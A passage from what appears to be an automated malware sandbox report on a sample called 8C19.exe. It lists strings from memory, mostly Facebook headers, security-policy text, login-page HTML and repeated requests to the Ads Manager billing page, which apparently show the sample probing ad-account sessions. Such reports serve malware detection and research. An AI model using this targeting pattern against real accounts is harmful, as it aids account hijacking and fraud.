rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/ZVO5s7NaGvm.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Z6KNn4Q" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: @www.facebook.com equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: @www.facebook.com!g equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400X-FB-DebugwkwDdbqHVYC0lJuMZMqvdb71pi3WsKpwDI5OfXzFsujeGWPmeSQ+cXUBjSpAdaDcsqDNM5cLgeTe1kYxcrXaqQ==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveMon, 17 Oct 2022 20:07:01 GMTDateProxy-Conn
Source: 8C19.exe, 0000000A.00000003.537557430.000000000237A000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: EjSKTGrUfh8PuK3wJWwRknMt6z-ns8V38GHvMcdExgbIP4ZHOtmKw\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT2gvp-_yMyq0o_PKlQUNFTDSPC8h26_F_aVw55xSk372ft57jOmQ76xPbV4hs0VWoP6aLVSdFVA9rbSZGrK7M0VGejDndC20p5OwkFzU3rXY0p1sErSaedQ_Wz-Ihourhd_9xuSTBAVz5581Oow0A\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada\u003C\/a> in Canada or the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00252F&amp;h=AT066iXDlITwSDkNs equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.534980843.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536124394.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522569046.00000000023E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Hostwww.facebook.com equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ^hp?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing= equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: _.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: _www.facebook.com equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ext=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.541117743.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543170336.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534923998.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.561267156.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.560758101.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559528158.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.508467301.0000000000661000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535497910.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.541014339.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.563225002.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566103544.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.539332491.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.542287359.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537371018.0000000000662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/accos-wa5 equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.541117743.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543170336.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534923998.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.561267156.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.560758101.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559528158.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535497910.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.541014339.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.563225002.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566103544.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.539332491.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.542287359.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537371018.0000000000662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing<- equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.541117743.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543170336.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534923998.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.561267156.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.560758101.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559528158.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535497910.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.541014339.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.563225002.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566103544.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.539332491.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.542287359.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537371018.0000000000662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingD equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingf* equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rXhp?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_zh equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.534980843.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536067115.00000000023D2000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 